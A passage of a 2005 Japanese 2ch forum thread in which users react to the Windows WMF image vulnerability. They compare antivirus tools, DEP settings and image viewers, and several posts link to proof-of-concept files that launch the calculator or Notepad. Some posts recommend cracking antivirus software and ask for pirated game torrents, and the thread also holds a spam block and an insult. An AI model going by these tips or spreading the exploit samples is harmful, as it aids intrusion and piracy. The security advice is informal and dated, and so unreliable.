164 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:24:26 ID:n4m1sY4e0
>>161
うん、多分・・・
こっちは今も試してきたけど両方弾いたよ
NISだったかNAVだか忘れたけど再インスコしないと効かない人もいたような・・・・?

165 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:37:02 ID:smIS7WCR0
>>161
2006の最新だけどリンクを踏むと電卓起動
wmfをDLして検査をさせると削除する

166 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:39:46 ID:cxo16ysO0
BitDefenderはProなら常駐保護だけどな。
買える環境にある人はごく一部だと思うけど、アンチウイルスソフトではトップクラスかと。

まぁフリー版は他と併用で。

あと、結構スルーされているけど、トロイ系なのでスパイウェア系のアップデートもチェックしたほうが
いいかもしれないね。

SpyBotもAdwareも関連するようなアップデートは無かったけどな・・・。


167 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:40:04 ID:2O1zVcPo0
今旅行から帰ってきた
まとめるとMe使いの漏れには関係なしってことでFA?

168 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:48:20 ID:3eiQOO9q0
ノートン先生今対応したぞ

169 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:49:06 ID:3eiQOO9q0
orz

170 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:51:54 ID:quXzRwN30
おせーよ

171 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:55:55 ID:vQGjUNxF0
今北産業

172 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:57:00 ID:4mmmEXRx0
前スレ読んだのですがIrfanViewとはなんですか?
(何をしたら起動してしまうのですか?)

173 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:58:57 ID:c9obz/ot0
2chには接続出来て検索サイトには繋がらないようになってるのか

174 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:59:01 ID:V72wGZVJ0
>>167
同じくMe使いの俺は>>147踏んだところ両方普通にDLするも
メモ帳、電卓の起動はしなかった。Irfan使って開いても起動せず。
JPEGに拡張子直して開きなおしても起動しなかった。
不感症にもほどがある。

ま、ソフト使って弾くに越したことはないと思う

175 :ググレカス:2005/12/31(土) 09:59:06 ID:Qd/iClPw0
死ね

176 :[名無し]さん(bin+cue).rar:2005/12/31(土) 10:06:51 ID:VtkI9w+00
>>166
漏れもBD8FreeEitionは使ってるけど一部のantinny
(Antinny-Bとかだったかな)に対応してないからなぁ。
avast!は反応。

177 :[名無し]さん(bin+cue).rar:2005/12/31(土) 10:27:42 ID:mZfd5Zh30
avast!は常駐保護ついてるフリーとしてはいいんだろうけど、トラップ多いしなぁ
ちなみに自分はBD8のproplus使ってる。かなり優秀。

つーか、会社で使ってるノートンもバスター(一応最新版だけど)もへぼすぎるってのが問題だ・・・。

178 :[名無し]さん(bin+cue).rar:2005/12/31(土) 10:29:36 ID:rqVTFbr80
ノートンだと>>147にアクセスする段階でブロックしてくれるみたいだな。
ただ踏むだけでもブロック、ファイルを保存でも保存以前に当然ブロックだからとりあえず安心か。

179 :[名無し]さん(bin+cue).rar:2005/12/31(土) 10:43:57 ID:5V3jl2C60
ノーd更新して>>147開いたけど、開ける…orz
上はエラー出て終了するけど電卓部分は起動したまま残る
下はメモ帳?起動する

2KSP4 Opera
もう駄目ポ

180 :[名無し]さん(bin+cue).rar:2005/12/31(土) 10:53:12 ID:TwKM1FbDO
ワームとかに掛かってるって調べたいんだが、そういったソフトを入れてない方が感染してるっぽいんだ。


181 :[名無し]さん(bin+cue).rar:2005/12/31(土) 10:53:30 ID:pIVoqrEL0
2000でavast!入れたらSTOPエラー出てやむなくsafeモードで削除・・・
もうどうしようもねぇ(つД`)

182 :[名無し]さん(bin+cue).rar:2005/12/31(土) 10:56:55 ID:jHUZwsTS0
SONY BMGの「rootkit」訴訟、和解へ
ttp://www.itmedia.co.jp/news/articles/0512/30/news005.html

183 :[名無し]さん(bin+cue).rar:2005/12/31(土) 10:58:44 ID:bYGdU7400
>>179
漏れも…

184 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:00:39 ID:oOAPc1mI0
フレッツ使ってない奴限定でNOD32が良い
簡単に割れるし

185 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:12:47 ID:MEwJpOC80
>>179
PC再起動した?

186 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:35:45 ID:smIS7WCR0
ノートンでだめだ〜って奴は再インスコしてみ
アクティブ化もされた状態で再インスコされるし・・

ちゃんと反応するようになったよ


187 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:38:53 ID:Ozr1qKmb0
マカフィーは大丈夫?

188 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:46:23 ID:pIVoqrEL0
んなことより年賀状書かないと(´・ω・`)

189 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:53:18 ID:tCgOvEXO0
今から書くのかよ

190 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:56:12 ID:maDmiLNf0
前スレで話が出ていたBitDefenderってBitDefender 8 Free Editionってのでいいのかな
他にそれっぽいのが見当たらないんだけど…
指摘お願いしまする

>>184
NOD32って優秀だって聞くよね
イマイチ有名じゃないけど

191 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:58:14 ID:pjXecYyw0
年賀状からも可能性あるからお前ら気をつけろよ。

192 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:59:03 ID:pIVoqrEL0
>>190そう

193 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:59:32 ID:z7WtE2bx0
あ、年賀状書くの忘れてた…

194 :[名無し]さん(bin+cue).rar:2005/12/31(土) 11:59:51 ID:pjXecYyw0
× 年賀状からも可能性
○ 年賀状からも感染する可能性

195 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:01:26 ID:mZfd5Zh30
>>190

フリーは常駐保護ないから他のと併用しる。
その代わりBDは先生やバスターお比較にならんほどお勧めだけど。

Pro買えるなら常駐すっけどね。



196 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:03:18 ID:Kbl4oN880
ダウソ板の皆ってウイルス対策ソフト何使ってるの?
漏れは常駐してるのノートンとSpybotだけで、たまにバスターオンラインスキャンするぐらいなんだが

197 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:11:37 ID:mvPq2DfA0
>>140は電源落として再起動しただけで直ったのれすか?
それはDEPのせいなのでしょうか?
DEPを全てで有効にして再起動した直後なんで不安

198 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:12:36 ID:mZfd5Zh30
>>197

人によりけりでそ

とりあえず、
常駐保護+(非常駐保護)+マルウェア対策orスパイウェア対策+FW+MS付属FW
くらいはしてると思われ


199 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:12:37 ID:maDmiLNf0
>>192,195
ありがとう。
常駐モノは>>192さんの書き込みにあったavastを試しに使ってみる。

200 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:18:11 ID:ZjNpgtMd0
avast+ZoneAlarmだけだな

201 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:19:25 ID:oOAPc1mI0
avast!はシャットダウンフリーズが無ければいいソフト
とっととバグ直せ

202 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:20:44 ID:32+HU4QI0
今日入れてみたけど、フリーズしなかったな俺は

203 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:22:07 ID:1kEgmPux0
>>200
ネトラン厨みたいだなw

204 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:25:16 ID:aQdF/ltD0
Age of Mythology日本語版のトレント知りませんか?

205 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:26:31 ID:Zmx51BUg0
ミイラの呪い?研究者ら7人が謎の死…イタリア
ttp://www.yomiuri.co.jp/world/news/20051230i512.htm

206 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:31:34 ID:ARjoPld20
ノートン先生をうpデートしておけばnyで落としたzipとかに無敵入ってても、普通にWINRARとかで中身みたり、解凍したり、フォルダを開いても問題なし?

207 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:34:55 ID:h6McS24p0
いままで何も気にせずノートン先生だけでIE&IrfanView使ってたけど変えたほうがいいのか…
IEとIrfanViewを変えるとしてオススメのブラウザと画像閲覧ソフト教えてくだされ('A`)

208 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:37:23 ID:tqs8R3x70
ブラウザの画像を切って、dllを無効にした
他には先生を更新しただけだな

あとは無敵に当たるも八卦当たらぬも八卦

209 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:38:50 ID:MtTC9AEt0
ノートンで検出できないって人、Auto-Protectを完全スキャンにしてる?

210 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:44:04 ID:WehV9WtL0
ブラウザはプニルが最強

211 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:44:54 ID:l0YRWOtq0
ワームすごいですね、怖いっすね
Age of Mythology日本語版のトレント知りませんか?

212 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:49:27 ID:A4qLbvHg0
>>207
セキュリティ高めたいならFirefoxやOperaなど


213 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:55:32 ID:smIS7WCR0
>>209
正解

214 :[名無し]さん(bin+cue).rar:2005/12/31(土) 12:58:14 ID:zWH3viAO0
foxだとjavaの設定の切り替えがめんどくさいんだよな

215 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:03:58 ID:oOAPc1mI0
-------ここから俺の日記帳----------
NOD32でIMON有効にしたままだとブラウザが
おみとろんに接続しにいくのを邪魔されるので
使ってるブラウザを除外アプリに加えてから再起動する
-------ここまで俺の日記帳----------


216 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:21:35 ID:GWGykbLw0
avast導入してるんだけど>>147をダウンロードしてもavastは反応しないし電卓もメモ帖も開かない。
WIN98SEなんだけどどういうこと??

217 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:22:37 ID:9vizndX10
>>216
くだらん釣りはやめろよ。

218 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:23:56 ID:GWGykbLw0
釣りじゃないよ!本気で悩んでるんだけど。。。教えてください!

219 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:27:35 ID:pIVoqrEL0
>>216
安心はしない方がいい
脆弱性が98/ME/2000/XPに存在していたとしても、
実行するための方法というかコードは違う可能性もある
あくまで「XPの特定の環境において脆弱性が存在することを証明するサンプル」
>>147はすぎない

220 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:33:31 ID:EXpVIsQ/0
>>34おしたら警告でた!!成功かな。
ちなみにavast

221 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:35:42 ID:ifvfyDvC0
Windows 画像と Fax ビューア (Shimgvw.dll) を登録抹消する(中略)

1.[スタート] メニューの [ファイル名を指定して実行] に "regsvr32 -u %windir%\system32\shimgvw.dll"
(二重引用符は必要ありません) と入力し、次に [OK] をクリックします。
2.ダイアログ ボックスに、登録を解除するプロセスが正常に完了したことを確認するメッセージが表示されます。
[OK] をクリックして、ダイアログ ボックスを閉じます。

回避策の影響: Windows 画像と Fax ビューア は、ユーザーが Windows 画像と Fax ビューア に関連する
イメージの種類へのリンクをクリックしても起動されません。

これ設定したら画像見れない?

222 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:35:57 ID:qpUnJm/V0
DEP対応CPUだとSP2適用後のDEP設定のデフォルト状態でも反応しない?

223 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:37:43 ID:pIVoqrEL0
>>222 だめ。DEP全部有効にしないと意味無し

224 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:39:08 ID:quXzRwN30
>>221
MSパッチくるまで他のビューア使えばよろし

225 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:41:04 ID:zlBNsCKz0
>>224
IrfanView でOKですか?

226 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:41:52 ID:FWBX3E2a0 ?
>>225
おk

227 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:42:47 ID:qpUnJm/V0
>>223
そか、じゃあ昨日全有効する前のデフォ状態で
一度サンプル踏んでもメモ帳と電卓出なかったのはたまたまか…((( ;゚д゚)))

228 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:44:47 ID:quXzRwN30
>>225
IrfanViewもshimgvw.dllを使ってるからやめときな

229 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:45:45 ID:YDprSrhx0
((( ゚д゚ )))

230 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:49:07 ID:2gAo7o5v0
ACDに変えようとして死んだ。

231 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:52:02 ID:bDS1KS6u0
>34と>147ためしてみたらちゃんとノートン反応してくれた、よかった

232 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:53:18 ID:MsU6IfsX0
MangameeyaでZIP直読みでjpgなんかに偽装されたファイルもエラーでるんかな?
誰かZIPでうpしてくんない?

233 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:54:15 ID:taEUkh6j0
>>228
何使えばいいんすか?

234 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:55:27 ID:quXzRwN30
VIXでも使ってろ

235 :[名無し]さん(bin+cue).rar:2005/12/31(土) 13:56:26 ID:EXpVIsQ/0
Live2chで画像を縮小表示するようにしてあるんだけどこれやばいよね?
でもこの設定の解除の仕方がわらかない

236 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:02:01 ID:60+lUEnI0
IrfanViewはWMFとの関連付け削除しとけばよかんべ
拡張子の違うファイル開こうとしたら警告してくれるし。

237 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:03:31 ID:2gAo7o5v0


238 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:03:46 ID:ZJ4KNIDR0
拡張子替えても駄目だよん。

239 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:04:10 ID:eSaQBQfv0
>>233

                                    /\___/ヽ
    (.`ヽ(`> 、                         /''''''    '''''':::::\
     `'<`ゝr'フ\                 +   |(●),   、(●)、:| +
  ⊂コ二Lフ^´  ノ, /⌒)                   |  ,,,ノ(、_, )ヽ、,, .:::|
  ⊂l二L7_ / -ゝ-')´                +  |   `-=ニ=- ' .::::::| +
       \_  、__,.イ\           +     \   `ニニ´  .:::/    +
        (T__ノ   Tヽ        , -r'⌒! ̄ `":::7ヽ.`- 、   ./|
         ヽ¬.   / ノ`ー-、ヘ<ー1´|  ヽ | :::::::::::::ト、 \ (  ./ヽ
          \l__,./       i l.ヽ! |   .| ::::::::::::::l ヽ   `7ー.、‐'´ |\-、

ソースネクスト 「ウイルスセキュリティ2006」

240 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:11:19 ID:xij1e6pT0
IrfanViewで
検証用ファイル

ttp://grin.flagbind.jp/runcalc.wmf 電卓が起動するだけ
ttp://kikuz0u.x0.com/wmf_exp.html メモ帳が起動するだけ

起動しなかったんだけどダメなんかな

241 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:12:51 ID:86RlYc4H0
shimgvw.dllが無くても専ブラとかでは実効される。
どないせーっちゅうねん

242 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:19:11 ID:xij1e6pT0
ViXだと画像デカいな

243 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:19:55 ID:oOAPc1mI0
素直にアンチウィルスソフト入れりゃええがな
割るのが怖いんなら、軽くて無料で定義ファイルのうpデートも早くて
シャットダウン時にOS固まるバグがあるavast!
怖くねーんなら、レジストリいじればタダで定義ファイル落とし放題で
軽くて、スキャン速度爆速で、設定がいちいち再起動しないと反映されてないっぽいNOD32

244 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:21:54 ID:ZFKg2lJo0
良い機会だからFirefoxに乗り換えた
IEと同じような構成で良いねw

難点はブックマークの順番がバラバラになった事と
一定期間アクセスしないと隠れる機能が無い事…

245 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:23:05 ID:X5+/bgVH0
FW付きニャンチュないかな

246 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:23:12 ID:zlBNsCKz0
ウィルスソフト未導入って人居るのなら
バスターとか対応済みの試用版とりあえず入れて。


247 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:24:48 ID:xij1e6pT0
avast!入れてるけどビューワいじらなきゃ

検証用ファイル

ttp://grin.flagbind.jp/runcalc.wmf 電卓が起動するだけ
ttp://kikuz0u.x0.com/wmf_exp.html メモ帳が起動するだけ

起動するんだよね

248 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:32:01 ID:zHQfJ5+a0
>>247
開いたらavaが反応して止めてくれるよ
弄らなくても大丈夫

249 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:34:20 ID:w8wtCabv0
avast! 4 Home Edition入れたんだけど標準シールドなんて項目ないんだがもしかしてインストするツール間違えてる?

250 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:35:49 ID:xij1e6pT0
じゃあ俺の設定がダメなんかなぁ

251 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:36:08 ID:4H87w1pr0
標準シールドにwmfとか入れてやらんと環境によっては反応しなさす

252 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:37:20 ID:4H87w1pr0
>>249
タスクのエイベックスもどきをクリックしたら出てくるP2PシールドとかWebシールドとか書いてある奴の一番下


253 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:41:30 ID:L235o86m0
とりあえずwmfとjpgを追加しといたけどやばそうなのはどんどん入れなきゃ駄目なのかな

254 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:41:34 ID:w8wtCabv0
>>252
OutlookとWebシールドとインターネット・メールとネットワークシールドしかない(´・ω・`)

255 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:42:17 ID:mZeq5O9S0
既存のアンチウィルスをアンストしろ。

256 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:42:56 ID:zlBNsCKz0
http://pc8.2ch.net/test/read.cgi/sec/1135947708/2
>2 :名無しさん@お腹いっぱい。 :2005/12/30(金) 22:02:26
>ウイルスバスターユーザー向け2006への無料アップグレード
>ttp://www.trendmicro.com/jp/support/vbc/upgrade/related/overview.htm
>
>非ユーザー向け30日期間限定版(体験版)
>ttp://www.trendmicro.co.jp/consumer/products/trial/vb/
>※ファイル名の「f」を「s」に変更すればファイルサイズが小さい「プログラムのみ」がダウンロード出来る
>
>非ユーザー向け90日期間限定版(体験版)
>ttp://www.trendmicro.co.jp/vb2006/evaluate/xpsp2/trial-dl.asp
>
>最新版ダウンロード
>ウイルスバスター2006 インターネット セキュリティ
>ttp://www.trendmicro.co.jp/download/product.asp?productid=47
>2004、2005ユーザー向け無料アップグレード
>ttp://www.trendmicro.com/jp/support/vbc/upgrade/related/overview.htm


257 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:42:58 ID:xij1e6pT0
標準シールドをWebシールドと思ってる俺は負け組?

258 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:45:18 ID:MVVpK8Ve0
ノートン先生なんだけど>>147のクリックするとアクセス弾くんだが「ファイルを修復できません」とも出る・・・
「ファイルを修復できません」は出てもいいんだよね?


常識っぽいこと聞いてスマンが教えてください。

259 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:47:01 ID:L235o86m0
>>257
詳細表示にしたら標準シールドって出てたよ

260 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:47:04 ID:Ozr1qKmb0
ttp://home.p02.itscom.net/kichiku/gazou/nikki01/maeda.jpg

これってウイルス入り?

261 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:48:44 ID:xij1e6pT0
>>259
俺も>>254と同じ状況

つまり>>255したら標準シールドって出るのかな

262 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:50:15 ID:X5+/bgVH0
火狐とオペラとvixとMDIEファイラーとゾネとavast使えばいいんだろ

263 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:51:43 ID:IIWhgnrA0
あぁもう何をしたらいいのかわからん・・・PC一週間ぐらい使わないようにするよ。。

264 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:52:07 ID:aHU31A750
>>260
avast!検閲官の判定によりますと、問題なし だそうでございます


265 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:53:06 ID:Ozr1qKmb0
>>264
d
なんか貼られてたんで心配だったんだ、
こういう画像にも可能性があるってことでしょ?

266 :[名無し]さん(bin+cue).rar:2005/12/31(土) 14:56:17 ID:ZjNpgtMd0
割れのバスターとかノートン使っても、スグに対策されて
アップデートとか出来なくなるんだもん

フリーでいいや

267 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:02:24 ID:aHU31A750
これだけはやっとけ! リスト
1. ttp://amatanoyo.blog16.fc2.com/blog-entry-132.htmlを熟読するべし
2. アンチウイルスはとにかくいれとけ! もちろんデータベースは最新版な?
  フリーならavast!あたりが、市販ならバスターかノートン先生(無料で使いたいならアレでゴニョゴニョするべし)
3. WINXPのFWは話にならん、バスターやノートン投入してるならそれだけでもいいが、avast!ならZoneAlarmかOutpostあたりを入れておくべし
4. 共有してる奴は常に厳重警戒しろやゴラァ!! C69関連狙ってる奴は当然厳重軽快な
5. IEエンジンテラヨワスと思ったら火狐やオペラに乗り換えましょう、プニルもGeckoエンジン使えるのでお勧め

こんなところか?


268 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:07:43 ID:wEf+KqwZ0
>>247の上の検証用ファイルを

1.そのままzip圧縮
2.拡張子wmfををjpgに変えてzip圧縮
3.拡張子wmfをzipに書き換え

したファイルをそれぞれ作り、susieのjpg plugin投入のLeeyesで閲覧。

1.は拡張子wmfが画像ファイルでは無いと認識されリストされない
2.は偽装ファイルがリストされるが「このjpgは表示できません」とのエラー表示
3.は「この圧縮ファイルは展開できません」とのエラー表示

が出て、いずれの場合も電卓は起動せず。
なおリスト表示は「一覧/プレビュー/プレビュー(詳細)」のいずれでも反応変わらず。

漏れは2chブラウザとWEBブラウザは警戒を続けるが、nyは上記に留意して再開してみる。
感染したら報告すんのでヨロ

269 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:12:08 ID:wEf+KqwZ0
書き忘れたけど
作成したzipファイルは、いずれもエクスプローラー上では表示モードの如何に関わらず無害ですた。
マウスポインタ当てても電卓起動はナシ

270 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:14:08 ID:L//RhE2d0
キンタマ系のウィルスってアレだよな
nyフォルダにupfolder.txtを作れなくしたりポト0だと完全に無力じゃん
今回の脆弱性を悪用したキンタマウィルスが出てきても全然脅威じゃないよ
DOM最強杉

271 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:15:53 ID:LEEwGTSu0
山田は脅威だよ

272 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:16:10 ID:RmzFEvze0
つまりアレか、キンタマとかみたく解凍したら罹るんではなくて、当該ファイルが入ったフォルダ開くだけでもOUTってことでFA?
てことはもしnyで拾ってしまった場合、ミーヤとかで直接覗くのはセーフだが、downフォルダ開くとOUTってこと?

273 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:16:18 ID:X5+/bgVH0
メモ
ダウソした電卓起動wmf入りフォルダをエクスプローラーで開いただけで電卓が起動する
MDIEでフォルダを開いてみてもなんともない ダブクリかプロパティ見ると電卓起動
rar・zip圧縮してWinrarでリスト見る→解凍も問題無い

しかしアンチウィルスでは検出できない物が出てくるかもしれない と

274 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:19:18 ID:wEf+KqwZ0
susieのjpg plugin投入のLeeyesで閲覧

これ正確には

susieのjpgとzipのplugin投入のLeeyesで閲覧

です

275 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:20:35 ID:EXpVIsQ/0
スレ開いただけで警報なる・・・

276 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:20:50 ID:ojQ8FgXk0
今北産業
AVGは対応まだですか

277 :261:2005/12/31(土) 15:22:47 ID:y4GRguzA0
おkkkk

278 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:23:17 ID:avlHakdt0
>>34
をLive2chのCtrl押しながらのプレビューでもやっみたら警告(´・ω・`)

そんなにやばいのか(;^ω^)

279 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:25:13 ID:EXpVIsQ/0
>>278
スレ開いただけで警報なりまくりの俺よりまし
縮小表示解除できねーまじ助けて

280 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:25:20 ID:jkLbxtMz0
http://news19.2ch.net/test/read.cgi/newsplus/1135957610/l50
「業界ナンバー1になるには違法行為が許される」
(以下略、全文はソース元でご確認ください)
ソース(毎日新聞) http://www.mainichi-msn.co.jp/today/news/20051231k0000m040016000c.html
前スレッド http://news19.2ch.net/test/read.cgi/newsplus/1135938126/

281 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:29:54 ID:k+6bnCtd0
>>267
バスターもノートンも体験版があるじゃない。
パッチ来るまでの辛抱なんだから、わざわざゴニョゴニョしなくても。

282 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:33:20 ID:avlHakdt0
>>279
縮小表示ってなんだっけか



283 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:43:16 ID:P5OhF88W0
現時点では98SEは無問題だな
この先は分からんが・・・

284 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:48:43 ID:zHQfJ5+a0
98SE自体が問題ありまくりだ

285 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:49:12 ID:EXpVIsQ/0
>>282
縮小っつーか、サムネイルっつーか。
スレ開いただけで画像読み込んじまう

286 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:54:08 ID:E9LoBqXM0
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈
酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈酒井晴奈

287 :[名無し]さん(bin+cue).rar:2005/12/31(土) 15:58:57 ID:yHoOIFk20
>>285
適当なフォルダで
表示→詳細
ツール→フォルダオプション→表示タブ→すべてのフォルダに適用
でできないかな?

288 :287:2005/12/31(土) 16:01:50 ID:yHoOIFk20
>>287誤爆orz

289 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:06:30 ID:0dwJeeSK0
しかし世間様では、まだたいして騒がれてないのな。まっ、晦日だし皆休みか。
正月明けから大騒ぎか…googleさんでも関連記事4件かよ
ttp://news.google.co.jp/nwshp?ned=jp&topic=t

今北産業は、まず下記嫁
ttp://itpro.nikkeibp.co.jp/article/NEWS/20051231/226841/




290 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:08:29 ID:3vknUy7H0
>>145
